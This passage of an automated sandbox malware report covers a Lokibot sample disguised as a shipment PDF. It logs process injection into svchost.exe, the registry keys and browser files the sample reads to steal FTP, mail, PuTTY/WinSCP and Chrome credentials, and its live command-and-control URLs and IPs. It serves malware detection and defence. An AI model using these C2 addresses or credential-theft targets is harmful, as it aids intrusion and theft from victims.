Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C33C0 NtSetInformationProcess,SetUnhandledExceptionFilter,SetErrorMode,GetProcessHeap,InitializeSRWLock,InitializeSRWLock,RegDisablePredefinedCacheEx,EtwEventRegister,GetCommandLineW,memset,GetCurrentProcess,NtSetInformationProcess,HeapFree,HeapFree,ExitProcess,GetCurrentProcess,SetProcessAffinityUpdateMode,	3_2_006C33C0

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.48.1 80

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 31F008

Jump to behavior

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_001187B1 LogonUserW,

0_2_001187B1

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_000C3B3A

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000C48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_000C48D7

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_00124C27 mouse_event,

0_2_00124C27

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe"			Jump to behavior

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_00117CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00117CAF

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_0011874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0011874B

Source: Shipment Delivery No DE0093002-PDF.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Shipment Delivery No DE0093002-PDF.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000E862B cpuid

0_2_000E862B

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000F4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_000F4E87

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_00101E06 GetUserNameW,

0_2_00101E06

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000F3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_000F3F3A

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe

Code function: 0_2_000C49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_000C49A0

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7468, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Shipment Delivery No DE0093002-PDF.exe PID: 7492, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000003.00000002.2938265324.0000000002A21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\svchost.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\SysWOW64\svchost.exe	Code function: PopPassword		3_2_0040D069
Source: C:\Windows\SysWOW64\svchost.exe	Code function: SmtpPassword		3_2_0040D069

Source: Shipment Delivery No DE0093002-PDF.exe	Binary or memory string: WIN_81
Source: Shipment Delivery No DE0093002-PDF.exe	Binary or memory string: WIN_XP
Source: Shipment Delivery No DE0093002-PDF.exe	Binary or memory string: WIN_XPe
Source: Shipment Delivery No DE0093002-PDF.exe	Binary or memory string: WIN_VISTA
Source: Shipment Delivery No DE0093002-PDF.exe	Binary or memory string: WIN_7
Source: Shipment Delivery No DE0093002-PDF.exe	Binary or memory string: WIN_8
Source: Shipment Delivery No DE0093002-PDF.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 2.2.Shipment Delivery No DE0093002-PDF.exe.1360000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Shipment Delivery No DE0093002-PDF.exe.1970000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1708634601.0000000001970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1721699099.0000000001360000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_00136283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00136283
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_00136747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00136747
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C6AF0 EnterCriticalSection,RpcServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	3_2_006C6AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C6B60 RpcServerUnregisterIf,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	3_2_006C6B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_006C6BB0 RpcServerUnregisterIfEx,EnterCriticalSection,RpcMgmtStopServerListening,RpcMgmtWaitServerListen,LeaveCriticalSection,I_RpcMapWin32Status,	3_2_006C6BB0

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Service Execution	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	3 Windows Service	2 Valid Accounts	2 Obfuscated Files or Information	2 Credentials in Registry	1 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	117 System Information Discovery	Distributed Component Object Model	21 Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	3 Windows Service	1 Masquerading	LSA Secrets	231 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	312 Process Injection	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	312 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Shipment Delivery No DE0093002-PDF.exe	32%	Virustotal		Browse
Shipment Delivery No DE0093002-PDF.exe	39%	ReversingLabs	Win32.Trojan.AZORult

Source	Detection	Scanner	Label	Link
http://touxzw.ir/tking3/five/fre.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
touxzw.ir	104.21.48.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
http://touxzw.ir/tking3/five/fre.php	true	Avira URL Cloud: malware	unknown
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	svchost.exe, svchost.exe, 00000003.00000002.2937872020.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.1	touxzw.ir	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1622495
Start date and time:	2025-02-24 08:39:19 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Shipment Delivery No DE0093002-PDF.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/8@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 60 Number of non-executed functions: 278
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.60
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
02:40:18	API Interceptor	123x Sleep call for process: svchost.exe modified
07:40:03	Task Scheduler	Run new task: {CA618FB5-061A-420C-9D55-F4E3DF5C78AF} path:

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	Remittance_CT022024.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/fix/five/fre.php
	http://microsoft-sharepoint4543464633.pages.dev/index-2jc93/	Get hash	malicious	HTMLPhisher	Browse	microsoft-sharepoint4543464633.pages.dev/index-2jc93/
	install.exe	Get hash	malicious	Babadeda	Browse	api.secureserver.top/api/files/winpleskdedicated/installer.exe?key=winpleskdedicated
	ZmK1CAc4VP.exe	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/4wrd/
	uI1A364y2P.exe	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/
	QUOTATION NO REQ-19-000640.exe	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/am6a/
	LLLLLLLLASSSEERRRR.ps1	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	laserl.ps1	Get hash	malicious	FormBook	Browse	www.lucynoel6465.shop/jgkl/?y2IHp=hI+cEEoDMRK5HtHlz4V8IEOzbfVROUzo+nuR9x41ri89hVkyLZ4bVRvwmPB4YpqMZl4/b+D+8qc7dcfD2Dlpe8No0hPfAwO5oFY7qBV6wzFyOtp6qA==&iLy=Wfpx
	laserrrrrrrr.ps1	Get hash	malicious	FormBook	Browse	www.tumbetgirislinki.fit/k566/
	DHL parcel.exe	Get hash	malicious	FormBook	Browse	www.kdrqcyusevx.info/q64t/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
touxzw.ir	Remittance_CT022024.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	dfiCWCanbj.exe	Get hash	malicious	Lokibot	Browse	104.21.80.1
	Request for quotation -6001845515-XLSX.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	vsf098633534.exe	Get hash	malicious	Lokibot	Browse	104.21.64.1
	scan_0219025_pdf.exe	Get hash	malicious	Lokibot	Browse	104.21.112.1
	scan_07022025_pdf.exe	Get hash	malicious	DarkTortilla, Lokibot	Browse	104.21.112.1
	specs_916351_xlsx.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	specs_00235_xlsx.exe	Get hash	malicious	Lokibot	Browse	104.21.32.1
	specs_12788_xls.exe	Get hash	malicious	Lokibot	Browse	104.21.48.1
	LEmJJ87mUQ.exe	Get hash	malicious	Lokibot	Browse	172.67.134.88

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	https://storage.googleapis.com/mokhtarabdilah/f-incgrp01.html#4qNfNs102759VNtL653wzimcwzwgi338XKVBUGHIIFOTIRG89013JQUH2654Q31	Get hash	malicious	Unknown	Browse	172.67.69.226
	z1awb_post_dhl_.vbs	Get hash	malicious	GuLoader, Remcos	Browse	172.67.163.64
	z1awb_post_dhl_.vbs	Get hash	malicious	GuLoader, Remcos	Browse	172.67.163.64
	http://pearltimes.co.ug/wp-content/reports/qnts/au/auth/auhs1	Get hash	malicious	Unknown	Browse	172.67.208.140
	#Ud835#Udde6#Ud835#Uddf2#Ud835#Ude01#Ud835#Ude02#Ud835#Uddfd.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.86.196
	res.m68k.elf	Get hash	malicious	Unknown	Browse	172.65.156.160
	#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.136.89
	http://pearltimes.co.ug/wp-content/reports/qnts/au/auth/auhs1/	Get hash	malicious	Unknown	Browse	1.1.1.1
	rBOQandDrawings_pdf.scr.exe	Get hash	malicious	MSIL Logger, MassLogger RAT	Browse	104.21.80.1
	rRFQ532566.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.32.1

Process:	C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe
File Type:	ASCII text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	28674
Entropy (8bit):	3.5755949107577236
Encrypted:	false
SSDEEP:	768:G3i/YYPlYVLDumOlGJwp5Ju6AmLXFl10fnb1uLphM:UiAYPlgamOA9uLDM
MD5:	E1A590C0FBCD3CCA298B47733B2869E1
SHA1:	A8AE7B7D1EF5116D4351C700F2689E7D94F5130A
SHA-256:	94865FDAF27CB44AA5E48486C9446AA1A90BEA58413C87471506485BBE121F36
SHA-512:	FB45431960B601494351AC78EB01C0116A86766B07530124F4BE3381156D2CFBD4E7C41C5158955D431D0A4DEABBAD6A8AFB15F6AC1EE06F8B4977528BEAB059
Malicious:	false
Reputation:	low
Preview:	x055b8ce18cecc20000065758bb6000000669854489b560000006698d468ab27000000669855888be6000000669854a89b560000006698d4c8abc6000000669855e88b33000000669854099b230000006698d429abe2000000669855498b46000000669854699bc60000006698d489abc6000000669855a9330c669854c99be60000006698d844ffffffab4700000066985964ffffff8b4600000066985884ffffff9bc60000006698d8a4ffffffabc6000000669859c4ffffff8be2000000669858e4ffffff9b460000006698d805ffffffabc600000066985925ffffff8bc600000066985845ffffff339c6698d865ffffffab570000006698550d8b370000006698542d9b560000006698d44dab270000006698556d8b330000006698548d9b230000006698d4adabe2000000669855cd8b46000000669854ed9bc60000006698d40eabc60000006698552e330c6698544e9b160000006698d886ffffffab46000000669859a6ffffff8b67000000669858c6ffffff9b160000006698d8e6ffffffab0700000066985907ffffff8b9600000066985827ffffff9b330000006698d847ffffffab2300000066985967ffffff8be200000066985887ffffff9b460000006698d8a7ffffffabc6000000669859c7ffffff8bc6000000669858e7ffffff339c6698d408ab370000006698550a8b86

C:\Users\user\AppData\Local\Temp\aut9D1D.tmp

Download File

Process:	C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	80838
Entropy (8bit):	7.941193753611847
Encrypted:	false
SSDEEP:	1536:8ncEMpP0n/Olx/3DNgWUSzZtdo5Nrf9g6u3J6lPaHk5yOTbDZVRcF:8n54P0nGlh8SzZw5VK6uwaHSTbDZwF
MD5:	03992A6C8BEF74B4A2E87A8465BABFAC
SHA1:	9451E05BEDB2AF6185082EAA85E9C7C22823CCAF
SHA-256:	A8C2DB06467C37341438915015FFC1CADE9946473C8D4854A00C7B4C30FAD0D7
SHA-512:	90FDFBA934A615047230295C29E906CCD74E48728F173647936AFE42AD2CB71061EB2D8CDB8B5AB01FD52BEB47886C4039EFA8AABFBAEC38B2E5C6D72CFF29C7
Malicious:	false
Reputation:	low
Preview:	EA06.....G.U:..4.Nfs]f.Y.T.u...y..jt:%f...............~._.,W.s..j3X..\.HdR..g=...QI%r'G.Kl..U./...2..Z7^.S...y.})\|........M..E..y...W...."Y^fb...ei^.o...Z.~..._.........{8..~VK.....L....l}z....~.k.:..?+{.c........I.].....i.L..S..hSN..b...b.7..S....X.T.5......P....9.......T.u......P.!.O......:..4.NfrP...R..@K1%.;.[o2...V.0...".G....~.E6.M.....%J.8......N.@.-.l..$..+.I..y....-".:.f..<Af@._..q...'....yb.S.3<..a[..$....38.}-.........&..q+....H.;.#....zW......+....y...8....w.....j.O...Ri..-..].tut.-;.@.<24z'kyr.Tp.....1..7...k.S.Z0..#..x...P....@..\.?T.......8.}K...,.>......S...c... ......0..p...(.~ ....E.W8..].'.}.-.-:.Y.nh5...KW..:.ZP.y..... ..D...3.4.E..j\|.m..R..f\|.......@....Q.....cD...u...{....<.b.V..f.+&..j.s@...W...J@..4...J(@...<...t...x..o:U08C...<.......+.~.^.<..,S.5..p.u!...w....7]..)...d.>.Z........-.@{.i.P.\|P)\.-$...nk..4...W...Z..%s...e...=9....n..R.E..C....w....p.......ne....5..t6.t.g..M?@.L...........A;~.(.I..H..N.b...s.

C:\Users\user\AppData\Local\Temp\aut9D5C.tmp

Download File

Process:	C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	9610
Entropy (8bit):	7.601829193633195
Encrypted:	false
SSDEEP:	192:c09SJLZ7jNO7shK8LoGrfkdt4+45oh85H/pbPtp7PRwd09diVWVLLel7KQumDYpz:X9SJtjDMGTYt4+PhitRPRwd0TIWVLY7u
MD5:	CE97AD4A267170E1FA58DFACFE8641AF
SHA1:	0097EDAF49C062F48A3DE6D112DA5BC8B3A2FA60
SHA-256:	D0849709BBB7A4A6A4E08C75AABC9143F090C18F6EE936A052DBBDD79A0904AF
SHA-512:	B05306026743A05F32ED267804B1976829E8EFAD1082287E6D0CB7097590B68AFDCAE23215C79E4A140689C4C03441BB55B9723709B674C866FFCC2DF2F8481B
Malicious:	false
Reputation:	low
Preview:	EA06..p..L&.[...e....;..`....y...b.......s8..&...j.%.$.m8..Sp.N.g.....m.X@..K...c.$....lL.`..Ng6)...l.I...b....4..,S@..l.l.-z..f.6\|v...Qc.0.......q4.Y..k..h......c ._..p.1....qa.H....9..$l.3..Y@.6...$.a5.H.f@.....\|3....fs9..%d.M...5...&.@.@.K.I.....Y.x>9.....Y.j.;.......j.;-....Y@j.9.....K,..1...'.`....\|.....,S`..N,`...H.......\|....F. ,_...c3..........;..:&.>_L.n....f.G_T......\|.).......&.....8...&V....ia...=.....Y......&..`.l..\|.[.....Yl ....ab...,@....ib........h.._..@...3\|.P.o.ac.....+.....N.i\|sk....8..4\|.0...c....7....k ..7.X..TD....M&`....g....,,`....>.Y...$.@&....L&.P.....32.\|&.G%......h...,..33.%.....BS...Nf......f.4.L,.9."....Bvp.Y...ffS{$..d..,.@8@.......@.3d.L..k4.h..M.B:.Y...fg6.;.ab....98.L..:.....of.L.*..Fp........36.Y&.k,.b...' !...,t.33.4.c2.X.M....#......j.d...[..%3.....c....M'6...ic....!..,..3 k..p....@...L&..........., ....#......f.8.X..K..`....zn........0{.k7....!..,...S.%..9..J@^@.G'.......aa.M..)LM@B:.Y...ffS...r....@...N@.:.....n..Mf@....

C:\Users\user\AppData\Local\Temp\autA0D6.tmp

Download File

Process:	C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	80838
Entropy (8bit):	7.941193753611847
Encrypted:	false
SSDEEP:	1536:8ncEMpP0n/Olx/3DNgWUSzZtdo5Nrf9g6u3J6lPaHk5yOTbDZVRcF:8n54P0nGlh8SzZw5VK6uwaHSTbDZwF
MD5:	03992A6C8BEF74B4A2E87A8465BABFAC
SHA1:	9451E05BEDB2AF6185082EAA85E9C7C22823CCAF
SHA-256:	A8C2DB06467C37341438915015FFC1CADE9946473C8D4854A00C7B4C30FAD0D7
SHA-512:	90FDFBA934A615047230295C29E906CCD74E48728F173647936AFE42AD2CB71061EB2D8CDB8B5AB01FD52BEB47886C4039EFA8AABFBAEC38B2E5C6D72CFF29C7
Malicious:	false
Reputation:	low
Preview:	EA06.....G.U:..4.Nfs]f.Y.T.u...y..jt:%f...............~._.,W.s..j3X..\.HdR..g=...QI%r'G.Kl..U./...2..Z7^.S...y.})\|........M..E..y...W...."Y^fb...ei^.o...Z.~..._.........{8..~VK.....L....l}z....~.k.:..?+{.c........I.].....i.L..S..hSN..b...b.7..S....X.T.5......P....9.......T.u......P.!.O......:..4.NfrP...R..@K1%.;.[o2...V.0...".G....~.E6.M.....%J.8......N.@.-.l..$..+.I..y....-".:.f..<Af@._..q...'....yb.S.3<..a[..$....38.}-.........&..q+....H.;.#....zW......+....y...8....w.....j.O...Ri..-..].tut.-;.@.<24z'kyr.Tp.....1..7...k.S.Z0..#..x...P....@..\.?T.......8.}K...,.>......S...c... ......0..p...(.~ ....E.W8..].'.}.-.-:.Y.nh5...KW..:.ZP.y..... ..D...3.4.E..j\|.m..R..f\|.......@....Q.....cD...u...{....<.b.V..f.+&..j.s@...W...J@..4...J(@...<...t...x..o:U08C...<.......+.~.^.<..,S.5..p.u!...w....7]..)...d.>.Z........-.@{.i.P.\|P)\.-$...nk..4...W...Z..%s...e...=9....n..R.E..C....w....p.......ne....5..t6.t.g..M?@.L...........A;~.(.I..H..N.b...s.

C:\Users\user\AppData\Local\Temp\autA1A2.tmp

Download File

Process:	C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe
File Type:	data
Category:	dropped
Size (bytes):	9610
Entropy (8bit):	7.601829193633195
Encrypted:	false
SSDEEP:	192:c09SJLZ7jNO7shK8LoGrfkdt4+45oh85H/pbPtp7PRwd09diVWVLLel7KQumDYpz:X9SJtjDMGTYt4+PhitRPRwd0TIWVLY7u
MD5:	CE97AD4A267170E1FA58DFACFE8641AF
SHA1:	0097EDAF49C062F48A3DE6D112DA5BC8B3A2FA60
SHA-256:	D0849709BBB7A4A6A4E08C75AABC9143F090C18F6EE936A052DBBDD79A0904AF
SHA-512:	B05306026743A05F32ED267804B1976829E8EFAD1082287E6D0CB7097590B68AFDCAE23215C79E4A140689C4C03441BB55B9723709B674C866FFCC2DF2F8481B
Malicious:	false
Reputation:	low
